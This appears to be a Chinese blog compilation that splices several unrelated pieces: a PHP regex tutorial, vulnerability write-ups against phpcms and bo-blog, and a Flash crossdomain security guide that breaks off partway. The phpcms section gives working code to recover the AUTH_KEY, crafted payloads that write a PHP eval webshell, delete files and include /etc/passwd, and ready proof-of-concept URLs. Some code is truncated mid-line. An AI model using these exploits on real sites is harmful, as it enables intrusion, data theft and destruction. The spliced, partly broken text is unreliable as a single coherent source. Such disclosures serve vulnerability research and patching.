跟我学正则表达式!

想必很多人都对正则表达式都头疼.今天,我以我的认识,加上网上一些文章,希望用常人都可以理解的表达方式.来和大家分享学习经验.

开篇,还是得说说 ^  和  $  他们是分别用来匹配字符串的开始和结束，以下分别举例说明

“^The”: 开头一定要有”The”字符串;
“of despair$”:  结尾一定要有”of despair” 的字符串;

那么,
“^abc$”: 就是要求以abc开头和以abc结尾的字符串，实际上是只有abc匹配
“notice”: 匹配包含notice的字符串

你可以看见如果你没有用我们提到的两个字符（最后一个例子），就是说 模式（正则表达式） 可以出现在被检验字符串的任何地方，你没有把他锁定到两边

接着,说说 ‘*’, ‘+’,和 ‘?’,
他们用来表示一个字符可以出现的次数或者顺序. 他们分别表示：
“zero or more”相当于{0,},
“one or more”相当于{1,},
“zero or one.”相当于{0,1},  这里是一些例子:

“ab*”:  和ab{0,}同义,匹配以a开头,后面可以接0个或者N个b组成的字符串(“a”, “ab”, “abbb”, 等);
“ab+”: 和ab{1,}同义,同上条一样，但最少要有一个b存在 (“ab”, “abbb”, 等.);
“ab?”:和ab{0,1}同义,可以没有或者只有一个b;
“a?b+$”: 匹配以一个或者0个a再加上一个以上的b结尾的字符串.

要点, ‘*’, ‘+’,和 ‘?’只管它前面那个字符.

你也可以在大括号里面限制字符出现的个数，比如

“ab{2}”: 要求a后面一定要跟两个b（一个也不能少）(“abb”);
“ab{2,}”: 要求a后面一定要有两个或者两个以上b(如”abb”, “abbbb”, 等.);
“ab{3,5}”: 要求a后面可以有2－5个b(“abbb”, “abbbb”, or “abbbbb”).

现在我们把一定几个字符放到小括号里，比如：

“a(bc)*”: 匹配 a 后面跟0个或者一个”bc”;
“a(bc){1,5}”: 一个到5个 “bc.”

还有一个字符 ‘│’, 相当于OR 操作:

“hi│hello”: 匹配含有”hi” 或者 “hello” 的 字符串;
“(b│cd)ef”: 匹配含有 “bef” 或者 “cdef”的字符串;
“(a│b)*c”: 匹配含有这样多个（包括0个）a或b，后面跟一个c
的字符串;

一个点(‘.’)可以代表所有的单一字符,不包括”\n”

如果,要匹配包括”\n”在内的所有单个字符,怎么办?

对了,用’[\n.]‘这种模式.

“a.[0-9]“: 一个a加一个字符再加一个0到9的数字
“^.{3}$”: 三个任意字符结尾 .

中括号括住的内容只匹配一个单一的字符

“[ab]“: 匹配单个的 a 或者 b ( 和 “a│b” 一样);
“[a-d]“: 匹配’a’ 到’d'的单个字符 (和”a│b│c│d” 还有 “[abcd]“效果一样); 一般我们都用[a-zA-Z]来指定字符为一个大小写英文
“^[a-zA-Z]“: 匹配以大小写字母开头的字符串
“[0-9]%”: 匹配含有 形如 x％ 的字符串
“,[a-zA-Z0-9]$”: 匹配以逗号再加一个数字或字母结尾的字符串

你也可以把你不想要得字符列在中括号里，你只需要在总括号里面使用’^’ 作为开头 “%[^a-zA-Z]%” 匹配含有两个百分号里面有一个非字母的字符串.

要点:^用在中括号开头的时候,就表示排除括号里的字符

为了PHP能够解释，你必须在这些字符面前后加”,并且将一些字符转义.

不要忘记在中括号里面的字符是这条规路的例外—在中括号里面, 所有的特殊字符，包括(”), 都将失去他们的特殊性质 “[*\+?{}.]“匹配含有这些字符的字符串.

还有,正如regx的手册告诉我们: “如果列表里含有 ‘]’, 最好把它作为列表里的第一个字符(可能跟在’^'后面). 如果含有’-', 最好把它放在最前面或者最后面, or 或者一个范围的第二个结束点[a-d-0-9]中间的‘-’将有效.

看了上面的例子,你对{n,m}应该理解了吧.要注意的是,n和m都不能为负整数,而且n总是小于m. 这样,才能 最少匹配n次且最多匹配m次. 如”p{1,5}”将匹配 “pvpppppp”中的前五个p

下面说说以\开头的

\b 书上说他是用来匹配一个单词边界,就是…比如’ve\b’,可以匹配love里的ve而不匹配very里有ve

\B 正好和上面的\b相反.例子我就不举了

…..突然想起来….可以到http://www.phpv.net/article.php/251 看看其它用\ 开头的语法

好,我们来做个应用:

如何构建一个模式来匹配 货币数量 的输入

构建一个匹配模式去检查输入的信息是否为一个表示money的数字。我们认为一个表示money的数量有四种方式： “10000.00″ 和 “10,000.00″,或者没有小数部分, “10000″ and “10,000″. 现在让我们开始构建这个匹配模式:

^[1-9][0-9]*$

这是所变量必须以非0的数字开头.但这也意味着 单一的 “0″ 也不能通过测试. 以下是解决的方法:

^(0│[1-9][0-9]*)$

“只有0和不以0开头的数字与之匹配”，我们也可以允许一个负号在数字之前:

^(0│-?[1-9][0-9]*)$

这就是: “0 或者 一个以0开头 且可能 有一个负号在前面的数字.” 好了,现在让我们别那么严谨，允许以0开头.现在让我们放弃 负号 , 因为我们在表示钱币的时候并不需要用到. 我们现在指定 模式 用来匹配小数部分:

^[0-9]+(\.[0-9]+)?$

这暗示匹配的字符串必须最少以一个阿拉伯数字开头. 但是注意，在上面模式中 “10.” 是不匹配的, 只有 “10″ 和 “10.2″ 才可以. （你知道为什么吗）

^[0-9]+(\.[0-9]{2})?$

我们上面指定小数点后面必须有两位小数.如果你认为这样太苛刻,你可以改成:

^[0-9]+(\.[0-9]{1,2})?$

这将允许小数点后面有一到两个字符. 现在我们加上用来增加可读性的逗号（每隔三位）, 我们可以这样表示:

^[0-9]{1,3}(,[0-9]{3})*(\.[0-9]{1,2})?$

不要忘记 ‘+’ 可以被 ‘*’ 替代 如果你想允许空白字符串被输入话 (为什么?). 也不要忘记反斜杆 ’\’ 在php字符串中可能会出现错误 (很普遍的错误).

现在，我们已经可以确认字符串了, 我们现在把所有逗号都去掉 str_replace(“,”, “”, $money) 然后在把类型看成 double然后我们就可以通过他做数学计算了.

再来一个:

构造检查email的正则表达式

在一个完整的email地址中有三个部分:
1. 用户名 (在 ‘@’ 左边的一切),
2.’@',
3. 服务器名(就是剩下那部分).

用户名可以含有大小写字母阿拉伯数字,句号 (‘.’), 减号(‘-’), and 下划线 (‘_’). 服务器名字也是符合这个规则,当然下划线除外.

现在, 用户名的开始和结束都不能是句点. 服务器也是这样. 还有你不能有两个连续的句点他们之间至少存在一个字符，好现在我们来看一下怎么为用户名写一个匹配模式:

^[_a-zA-Z0-9-]+$

现在还不能允许句号的存在. 我们把它加上:

^[_a-zA-Z0-9-]+(\.[_a-zA-Z0-9-]+)*$

上面的意思就是说: “以至少一个规范字符（除了.）开头,后面跟着0个或者多个以点开始的字符串.”

简单化一点, 我们可以用 eregi()取代 ereg().eregi()对大小写不敏感, 我们就不需要指定两个范围 “a-z” 和 “A-Z” – 只需要指定一个就可以了:

^[_a-z0-9-]+(\.[_a-z0-9-]+)*$

后面的服务器名字也是一样,但要去掉下划线:

^[a-z0-9-]+(\.[a-z0-9-]+)*$

好. 现在只需要用”@”把两部分连接:

^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*$

这就是完整的email认证匹配模式了,只需要调用

eregi(‘^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*$ ’,$eamil)

就可以得到是否为email了
正则表达式的其他用法

提取字符串

ereg() and eregi() 有一个特性是允许用户通过正则表达式去提取字符串的一部分(具体用法你可以阅读手册). 比如说,我们想从 path/URL 提取文件名 – 下面的代码就是你需要:

ereg(“([^\\/]*)$”, $pathOrUrl, $regs);
echo $regs[1];

高级的代换

ereg_replace() 和 eregi_replace()也是非常有用的: 假如我们想把所有的间隔负号都替换成逗号:

ereg_replace(“[ \n\r\t]+”, “,”, trim($str));

最后,我把另一串检查EMAIL的正则表达式让看文章的你来分析一下.

“^[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+’.'@’.’[-!#$%&\'*+\\/0-9=?A-Z^_`a-z{|}~]+\.’.’[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+$”

如果能方便的读懂,那这篇文章的目的就达到了.

phpcms的phpcms_auth函数的加密密钥AUTH_KEY泄漏会导致本地包含任意文件下载等多个漏洞。
而对phpcms2008有的本地包含又可以导致直接写shell和删除文件。所以泄漏了phpcms的phpcms_auth函数的加密密钥AUTH_KEY就可能直接导致被秒杀。

《phpcms的phpcms_auth导致的本地文件包含漏洞和任意文件下载漏洞》http://www.wooyun.org/bugs/wooyun-2010-01795
已经说明了两个破解”phpcms_auth函数的加密密钥AUTH_KEY”的方法，但是还不是很理想，最理想的是直接给我们足够的明文和密文。
是的开放的phpcms真的给我们这样的了，没有保留。

上一篇说到”破解了这个函数之后，一方面反而更加不安全了，另一方面所有建立在这个函数之上的机制可能都会受到攻击。”
其实一切建立在这个函数上的代码都可能给我们机会破解这个密钥。
来看magic_image函数，主要作用就是将字符串生成一个图片，这样做应该是为了防止别人采集网站上的数据，或者是防止泄漏隐私。

// include global.fun.php

function magic_image($txt, $fonttype = 4)
{
if(empty($txt)) return false;
if(function_exists(“imagepng”))
{
$txt = urlencode(phpcms_auth($txt, ‘ENCODE’, AUTH_KEY));
$txt = ‘‘;
}
return $txt;
}

在招聘、供求信息、跳蚤市场等多个功能模块都用到了这个函数。而且像供求信息、跳蚤市场貌似普通注册用户就能发贴。
发贴的时候在电话号码或邮箱那的字符就会被magic_image函数加密，显示给用户的时候又会调用magic_image.php文件，对字符串解密并进行生成图片。
就是说：
我们可以自定义明文
并且我们也可以得到明文加密后的密文

这就意味这我们可以得到全部密文(只要电话或邮箱的长度大于20位即可)，不费什么力气。

——————–
举例说明
1.在http://demo.phpcms.cn随便注册个普通用户会员
2.在跳蚤市场那

http://demo.phpcms.cn/info/sale/

随便点开一个信息页点右侧的 【免费发布信息】 http://demo.phpcms.cn/contribute.php?catid=22
随便发一条信息
使用邮箱为
mailc4rp3nt3r@gmail.com
3.最后找到我们发布的信息:

http://demo.phpcms.cn/2011/0405/366.html

查看邮箱图片的地址

http://demo.phpcms.cn/magic_image.php?gd=1&fonttype=4&txt=ADcCAw9wKjtaOhNGAS0uPQorC14OOQY%3D

——————–

好了
明文:mailc4rp3nt3r@gmail.com
密文:ADcCAw9wKjtaOhNGAS0uPQorC14OOQY%3D

解密一下:
$key="mailc4rp3nt3r@gmail.com";
$txt='ADcCAw9wKjtaOhNGAS0uPQorC14OOQY%3D';
$txt=base64_decode(urldecode($txt));

for($i=0;$i
运行结果:
$ php /var/www/vul.php
OXdcFVodxAcbCUeTgLBgOXdc

我们的密钥就是：
OXdcFVodxAcbCUeTgLBg

phpcms本地包含拿shell的方法，这篇文章接上一个

http://www.wooyun.org/bugs/wooyun-2010-01795

《phpcms的phpcms_auth导致的任意变量覆盖漏洞、本地文件包含漏洞和任意文件下载漏洞》

phpcms本地包含类漏洞，如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。

由于phpcms的全局变量机制，导致能拿shell的方法很多，类似的问题不止一个。

admin/safe.inc.php文件是后台扫木马的程序，但是很可惜的是虽然文件名叫做safe，但是一点也不safe。

公布一个本地包含秒杀拿shell的方法。

包含:admin/safe.inc.php文件GET提交一下数据

将在根目录下生成一句话
用上一篇得到的密钥$key=’sIpeofogblFVCildZEwe’;
加密如下字符串
$evil=’i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00′;

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=

将在根目录下生成一句话木马

同理任意文件删除漏洞：
$evil=’i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00′;

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==

贴上存在漏洞的代码
//admin/safe.inc.php
<?php
defined(‘IN_PHPCMS’) or exit(‘Access Denied’);
// include/common.inc.php 里面声明了常量
// define(‘IN_PHPCMS’, TRUE);

if(empty($action)) $action = “start”;
$safe = cache_read(‘safe.php’);
$filecheck = load(‘filecheck.class.php’);
if(empty($safe))
{
$safe = array (
‘file_type’ => ‘php|js’,
‘code’ => ”,
‘func’ => ‘com|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzuncompress’,
‘dir’ => $filecheck->checked_dirs()
);
}
switch ($action)
{
…
case ‘edit_code’:
if (file_put_contents(PHPCMS_ROOT.$file_path, stripcslashes($code)))
{
showmessage(‘修改成功！’);
}
break;

case ‘del_file’:
$file_path = urldecode($files);

if (empty($file_path))
{
showmessage(‘请选择文件’);
}
$file_list = cache_read(‘scan_backdoor.php’);
unset($file_list[$file_path]);
cache_write(‘scan_backdoor.php’,$file_list);
@unlink(PHPCMS_ROOT.$file_path);
showmessage(‘文件删除成功！’, ‘?mod=phpcms&file=safe&action=scan_table’);
break;
…

by c4rp3nt3r@0x50sec.org
mail: c4rp3nt3r#gmail.com
HomePage:http://www.0x50sec.org

phpcms_auth函数是phpcms里面为了增强程序的安全性的一个加密函数，在play.php、down.php 、download.php等等文件用它来对用户提交的加密字符串进行解密，进入程序流程，如果我们可以控制了phpcms_auth函数的解密，我们就可以通过注射我们的恶意代码，进行攻击。
而phpcms_auth采用的是可逆的位异或算法，并且对加密的结果进行了base64编码。
对于位异或算法来说只要我们破解了密钥字符串$key我们就完全控制了这个函数的加密解密。
对于base64编码主要是处理某些加密后的不可见字符，但是这给了我们一个很好的机会:
就是说我们破解了$key之后，我们就可以不受magic_quotes_pgc的限制引入%00字符串进行阶段，或者引入引号发起其他攻击。
到此已经违背了这个程序设计的初衷，破解了这个函数之后，一方面反而更加不安全了，另一方面所有建立在这个函数之上的机制可能都会受到攻击。

// include/global.func.php
function phpcms_auth($txt, $operation = 'ENCODE', $key = '')
{
$key    = $key ? $key : $GLOBALS['phpcms_auth_key'];
$txt    = $operation == 'ENCODE' ? $txt : base64_decode($txt);
$len    = strlen($key);
$code    = '';

for($i=0; $i<strlen($txt); $i++){
$k        = $i % $len;    //循环使用密钥字符串对字符串逐位进行异或
$code  .= $txt[$i] ^ $key[$k];
}
$code = $operation == 'DECODE' ? $code : base64_encode($code);
return $code;
}

对于$key的破解
对于位运算的异或运算，是可逆的，明文和密钥异或得到密文。如果我们知道密文并且知道一部分明文那么我们也就可以得到密钥，有了密钥我们就可以破解另一部分密文，当然也就可以对我们自己的明文进行加密，然后用我们精心构造的密文发起攻击了。

不幸的是phpcms的确给了我们可用来破解密钥的明文。

// include/fields/downfile/output.inc.php

function downfile($field, $value)
{
$contentid = $this->contentid;
$mode = $this->fields[$field]['mode'];
$result = '';
if($mode)
{
$servers = $this->fields[$field]['servers'];
$downloadtype = $this->fields[$field]['downloadtype'];
$servers = explode("\n",$servers);
foreach($servers AS $k=>$server)
{
$server = explode("|",$server);
$serverurl = $server[1];
$a_k = urlencode(phpcms_auth("i=$contentid&s=$serverurl&m=1&f=$value&d=$downloadtype", 'ENCODE', AUTH_KEY));
$result .= "<a href='down.php?a_k=$a_k' target='_blank'>$server[0]</a>";
}
}
else
{
$a_k = urlencode(phpcms_auth("i=$contentid&m=0&f=$value", 'ENCODE', AUTH_KEY));
$result = "<a href='down.php?a_k=$a_k' target='_blank'>点击下载</a>";
}
return $result;
}

这个文件是用来生成静态html文件的，默认安装的phpcms某个软件的下载页面地址为:

http://127.0.0.1/n/phpcms/2011/0331/2.html

进入下载文件的下载地址为:

http://127.0.0.1/n/phpcms/down.php?a_k=GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D

对加密字符串解密后为
密文:GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D
明文:i=2&s=&m=0&f=uploadfile/2011/0331/20110331121233766.zip&d=1
这里2.html的2就是数据库里id的值，如果没有设置镜像站点的话$serverurl为空
也就是说”i=2&s=&m=1&f=”是不会变的，我们可以破解12位的密钥了。
默认的话密钥有20位，如果用户上传目录没修改的话我们知道的明文就有”i=2&s=&m=0&f=uploadfile”共23个字符，可以得到全部密钥了。

$key="i=2&s=&m=0&f=uploadfile";
$txt='GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D';
$txt=base64_decode(urldecode($txt));
$len=strlen($key);
echo $len;
for($i=0;$i<strlen($key);$i++)
{
$code  .= $txt[$i] ^ $key[$i];
}
echo $code;
?>
运行结果为:sIpeofogblFVCildZEwesIp
可以看到sIp开始下一个循环加密了，所以密钥就是:sIpeofogblFVCildZEwe

还有一点就是下载的时候我们可以得到文件名:20110331121233766.zip
d的值是下载文件的类型，假设我们不知道也不要紧
就是说明文:20110331121233766.zip&d=是已知的有24位
密文:GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D

$key="20110331121233766.zip&d=";
$txt='GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D';

$txt=base64_decode(urldecode($txt));
$tlen=strlen($txt);
$klen=strlen($key);
for($i=1;$i<strlen($key);$i++)
{
$code  .= $txt[$tlen-$i-1] ^ $key[$klen-$i];
}
echo $code."\n";
echo $tlen."\n";
?>

运行结果为:
EZdliCVFlbgofoepIsewEZd
59
来看phpcms_auth源码
/*
...
$len    = strlen($key);
...

for($i=0; $i<strlen($txt); $i++){
$k        = $i % $len;
$code  .= $txt[$i] ^ $key[$k];
}
...
*/

我们可以知道
$key[17]=’E';
我们可以得到倒序的密钥字符串:
ewEZdliCVFlbgofoepIs

然后我们把字符串翻转过来终端下执行：

alone@Sh3llc0de:~$ echo ‘ewEZdliCVFlbgofoepIs’|rev
sIpeofogblFVCildZEwe

我们的密钥字符串就是:sIpeofogblFVCildZEwe

到此我们已经从一个攻击者的角度破解出了密钥。接下来我们看看由此引发的几个安全问题
————————————-

1.phpcms2008 sp2-sp4 本地文件包含漏洞
这个漏洞跟boblog刚爆出的任意变量覆盖漏洞有些相似，都是任意变量覆盖然后仅跟了一个本地文件包含。这种漏洞也是很好玩的，攻击的方法更灵活。

//play.php
require dirname(__FILE__).'/include/common.inc.php';
if(!isset($a_k)) showmessage($LANG['illegal_parameters']);
//common.inc.php文件的全局变量机制已经将所有GPC数据导出为变量了
//所以$a_k=$_GET[$a_k];
$a_k = phpcms_auth($a_k, 'DECODE', AUTH_KEY); //这里是关键分析见上文

*/
?>

接下来生成我们的攻击字符串:
$key='sIpeofogblFVCildZEwe';
$evil='i=1&m=1&f=fuck&mod=../../../../../../../etc/passwd%00&c4rp3nt3r=0x50sec.org';
//经过parse_str($evil);后c4rp3nt3r变量并没有被创建
//这个地方我也不是很明白为什么可以进行截断
//但事实上真的可以截断

for($i=0; $i<strlen($txt); $i++){
$k        = $i % $len;
$code  .= $txt[$i] ^ $key[$k];
}
$code = $operation == 'DECODE' ? $code : base64_encode($code);
return $code;
}
?>

alone@Sh3llc0de:/var/www$ php v.php
GnRBQwJbXkEEUSAjIAJKCTUhSktdZl5LQEhBSExCaXhtRkJKdWtZShY9E0ofBxwUFQhjZnNPD1AoNUQLB3oCWF8eWlcRCSV4LBsL

POC：http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKCTUhSktdZl5LQEhBSExCaXhtRkJKdWtZShY9E0ofBxwUFQhjZnNPD1AoNUQLB3oCWF8eWlcRCSV4LBsL
成功包含了/etc/passwd

2.phpcms2008 sp2-sp4、PHPCMS V9 正式版任意文件下载漏洞

以phpcms2008为例

down.php 和download.php都存在这个漏洞，具体利用跟上面的文件包含差不多就不多罗嗦了，成功利用此漏洞可以下载任意文件，包括.php后缀的文件。
只是download.php的加密方式是：
//download.php
…
$phpcms_auth_key = md5(AUTH_KEY.$_SERVER['HTTP_USER_AGENT']);
$a_k = phpcms_auth($a_k, ‘DECODE’, $phpcms_auth_key);
…
这样可能主要是为了仿制迅雷等浏览器的下载。但是既然我们知道了AUTH_KEY(见上文分析的密钥$key),$_SERVER['HTTP_USER_AGENT']是由用户提交的，那么$phpcms_auth_key 我们自然也就知道了。
除了上面说的知道部分明文来算$key，还有可能暴力破解$key.
还有就是经过md5加密后也未必就更安全，因为系统生成的$key有20位但是每一位都肯能个是大写或者小写字母，也就是有52种可能，但是经过md5加密后每一位就变成只有16种可能了，大大增加了被暴力破解的可能性。

全文结束
参考和致谢:
80vul.com《高级PHP应用程序漏洞审核技术》
Ryat[puretot] 《bo-blog任意变量覆盖漏洞》

先看xeyeteam的文章《浏览器urlencode策略差异导致XSS风险》以及余先生的博文《浏览器差异带来的XSS风险1》，又是一个标准问题…

当Ryat牛看到这篇文章后感同身受，就在我的上一个blog里提到的《boblog任意变量覆盖漏洞》里，在测试的时候就出现过这个问题：

『start』
// go.php

$q_url=$_SERVER["REQUEST_URI"];
@list($relativePath, $rawURL)=@explode(‘/go.php/’, $q_url);
$rewritedURL=$rawURL;
…
$RewriteRules[]=”/page\/([0-9]+)\/([0-9]+)\/?/”;
// 这个正则看上去很严谨,但是没有使用^和$来限制开头与结尾[可能是为了适应程序自身的需要]:)
…
$RedirectTo[]=”index.php?mode=\\1&page=\\2″;
…
foreach ($RewriteRules as $rule) {
if (preg_match($rule, $rewritedURL)) {
$tmp_rewritedURL=preg_replace($rule, ‘<’.$RedirectTo[$i].’<’, $rewritedURL, 1);
// 对$rewritedURL进行匹配和替换,并使用<来标记匹配的部分
// 经过这样的处理后$tmp_rewritedURL主要分为三部分:
// i.第一个<前面的部分
// ii.两个<之间的部分
// iii.第二个<后面的部分
$tmp_rewritedURL=@explode(‘<’, $tmp_rewritedURL);
$rewritedURL=($tmp_rewritedURL[2]) ? false : $tmp_rewritedURL[1];
// 这段代码的主要目的是解决之前的正则限制不够严格的问题
// 程序员希望通过这段代码去掉i和iii,使$rewritedURL仅保留ii
// 注意这里还对iii做了限制,按照程序员的想法,iii这部分应该是不存在的:)
// 这部分代码逻辑的关键就在于<这个字符,但遗憾的是我们是可以随意注入<的:p
break;
}
$i+=1;
『end』

在这个漏洞的测试的时候，这个问题直接影响到了Ryat牛的测试进程，最后写程序提交才完成…

所以我大体YY一下作者所用<处理变量的理由：‘我再想bob的作者是不是误认为request_url里的< “啥的本来就该被编码  所以才放心的用<来分割 ’

当然这一切都是我们的主观臆断！！

这个故事说明一个问题，浏览器这次的“urlencode策略差异”，可以导致程序员“错觉”，从而导致悲剧的结果！这个和《各个语言格式标准不同导致的安全问题》有着异曲同工的效果 :)

by Ryat[puretot]
mail: puretot at gmail dot com
team: http://www.80vul.com
date: 2011-03-09

先前80vul.com上公布了一个bo-blog的漏洞[1],这个漏洞已经被官方修补,但随后wooyun.com上公布了一个绕过补丁的方法[2],可惜触发时有一定的限制,下面我再来公布一个没有任何限制的绕过补丁继续触发漏洞的方法:)

这个简单来说是正则表达式和代码逻辑不够严谨造成的,来看代码:

// go.php

$q_url=$_SERVER["REQUEST_URI"];
@list($relativePath, $rawURL)=@explode(‘/go.php/’, $q_url);
$rewritedURL=$rawURL;
…
$RewriteRules[]=”/page\/([0-9]+)\/([0-9]+)\/?/”;
// 这个正则看上去很严谨,但是没有使用^和$来限制开头与结尾[可能是为了适应程序自身的需要]:)
…
$RedirectTo[]=”index.php?mode=\\1&page=\\2″;
…
foreach ($RewriteRules as $rule) {
if (preg_match($rule, $rewritedURL)) {
$tmp_rewritedURL=preg_replace($rule, ‘<’.$RedirectTo[$i].’<’, $rewritedURL, 1);
// 对$rewritedURL进行匹配和替换,并使用<来标记匹配的部分
// 经过这样的处理后$tmp_rewritedURL主要分为三部分:
// i.第一个<前面的部分
// ii.两个<之间的部分
// iii.第二个<后面的部分
$tmp_rewritedURL=@explode(‘<’, $tmp_rewritedURL);
$rewritedURL=($tmp_rewritedURL[2]) ? false : $tmp_rewritedURL[1];
// 这段代码的主要目的是解决之前的正则限制不够严格的问题
// 程序员希望通过这段代码去掉i和iii,使$rewritedURL仅保留ii
// 注意这里还对iii做了限制,按照程序员的想法,iii这部分应该是不存在的:)
// 这部分代码逻辑的关键就在于<这个字符,但遗憾的是我们是可以随意注入<的:p
break;
}
$i+=1;
}

从上面的分析可以看出这段代码对$rewritedURL处理逻辑貌似很严谨,但事实我们只要通过简单的注入<这个字符,就可以打乱整个逻辑了:)

PoC:
/go.php/<[evil code]<page/1/1/

参考:
[1]http://www.80vul.com/boblog/boblog.txt
[2]http://www.wooyun.org/bugs/wooyun-2010-01491

[ 目录 ]

0×00 前言
0×01 安全的服务端flash安全策略
0×02 安全的客户端flash安全规范
0×03 flash安全的checklist

0×00 前言

flash作为一款浏览器的第三方插件，是对浏览器功能的延伸，已经是web必不可少的元素。但是这种延伸必然带来不安全的因素，相比于安全性已经得到磨练的浏览器来说，flash绝对是客户端安全的一个软肋（包括在比较神秘的漏洞挖掘领域，也是这个观点），同样flash在页面展示时所含有的丰富功能，在某些情况下你甚至可以认为它等同于javascript，甚至更为危险。浏览器所贯彻的域安全策略被flash所打破，客户端所做的种种过滤也同样被 flash所打破（只要你还使用flash）。但是flash也已经感觉到了这个问题，并且时时在改进，在设计上也引入了一些比较好的安全机制，恰当的使用这些安全机制可以避免你的应用程序遭到攻击。80sec将从实际的一些经验总结出一些供参考的flash使用规范，规范将从服务端应用程序的安全设计和客户端的flash安全使用两个角度来说明这个问题。

0×01 安全的服务端flash安全策略

应用程序安全设计的时候应该秉承最小化原则，在flash的大部分应用中，由于功能需求就经常需要跨域获取数据。域安全是浏览器安全的基本策略，flash作为浏览器的扩展允许跨域获取数据就从根本上打破了浏览器的安全性。flash以flash文件存储域名作为它的当前域，如果需要获取其他服务器上的数据就会发生跨域行为，而且该跨域行为会继承用户浏览器里的认证信息，限制不严格时将导致安全漏洞，打破我们的整个客户端安全模型。flash 在跨域时唯一的限制策略就是crossdomain.xml文件，该文件限制了flash是否可以跨域获取数据以及允许从什么地方跨域获取数据。通过严格控制该策略文件我们就可以为应用程序安全和功能上寻找到一个平衡点。

典型的crossdomain.xml文件策略

<?xml version=”1.0″?>
<cross-domain-policy>
<allow-access-from domain=”*.80sec.com” />
</cross-domain-policy>

其中最主要的策略是allow-access-from表示允许来自哪些域的跨域请求，早期的flash允许从其他位置载入自定义的策略文件，目前最新版的flash在接受自定义的策略文件之前会去检查主目录的crossdomain.xml来判断是否接受自定义策略文件。该选项由

<site-control permitted-cross-domain-policies=”by-content-type”/>

节点控制，不加该选项时，默认情况下flash不加载除主策略文件之外的其他策略文件，即只接受根目录里的/crossdomain.xml。这对于防止利用上传文件来定义自己策略文件的攻击非常有效。为了在某些条件下需要启用其他策略文件，我们需要设置permitted-cross-domain- policies，设置为by-content-type时将会只允许http头为text/x-cross-domain-policy的策略文件，当为all时则允许所有的text/xml等格式的策略文件。

应用程序在设计的时候按照最小化原则

1 将文件上传和应用的域名分开，防止通过上传flash文件直接获得域操作的权限。
2 对于不需要使用flash的应用严禁在域名目录下部署flash策略文件。
3 对于有功能需求的应用遵循最小化原则将域名限制到最小的范围，有安全需求的应用应该明确允许跨域请求的域，禁止直接使用*通配符，这将导致跨域访问权限的扩散。

譬如http://sns.80sec.com/crossdomain.xml

<?xml version=”1.0″?>
<cross-domain-policy>
<allow-access-from domain=”*.80sec.com” />
</cross-domain-policy>

就对权限设置过泛，可能导致其他安全策略的绕过（如绕过csrf等等）

4 对于有高安全需求的应用，在限制域名的前提下，将需要被flash访问的应用限制到指定目录，并且在flash内指定策略文件到该目录以将所有访问权限限制到单一目录。

如果login.80sec.com中的某个功能如login需要对所有域名开放，如果配置根目录crossdomain.xml

<?xml version=”1.0″?>
<cross-domain-policy>
<allow-access-from domain=”*” />
</cross-domain-policy>

不是一个好的策略因为他不只会开放login同时会开放如chgpassword等其他的服务给用户，我们需要配置主策略文件

<?xml version=”1.0″?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies=”all”/>
</cross-domain-policy>

然后自定义策略文件到一个目录如/flash/crossdomain.xml

<?xml version=”1.0″?>
<cross-domain-policy>
<allow-access-from domain=”*” />
</cross-domain-policy>

并且将login应用部署到/flash/目录，用户的访问将被限制到/flash/下面，无法对其他功能进行操作。

0×02 安全的客户端flash安全规范

控制好flash安全策略并不是安全的全部，这样只能保证服务端的安全。由于一些功能上的原因，譬如为了追求良好的用户体验，为了让无聊的用户可以在页面共享各种flash，为了把页面做得华丽丽的，我们往往需要在页面内容里嵌入flash，这个时候安全性就会被抛到一边（我们还是建议如果不需要的话还是少用这种动态的东西）。我们在一个页面引入一个flash时，一般的做法是下面这种形式：

<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0″
name=”Main” width=”1000″ height=”600″ align=”middle” id=”Main”>
<embed flashvars=”site=&sitename=” src=’Loading.swf?user=453156346&key=df57546b-c68c-4fd7-9f9c-2d105905f132&v=10950&rand=633927610302991250′ width=”1000″ height=”600″
align=”middle” quality=”high” name=”Main” allowscriptaccess=”sameDomain” type=”application/x-shockwave-flash”
pluginspage=”http://www.macromedia.com/go/getflashplayer” />
</object>

由于flash的强大，并且在页面元素里基本等同于script这种危险的标签，对于这点，flash已经有所考虑，在引入flash的时候flash提供了控制属性，其中与安全最为关键的是AllowScriptAccess属性和allowNetworking属性。其中 AllowScriptAccess控制flash与html页面的通讯，可选的值有：

always //对与html的通讯也就是执行javascript不做任何限制
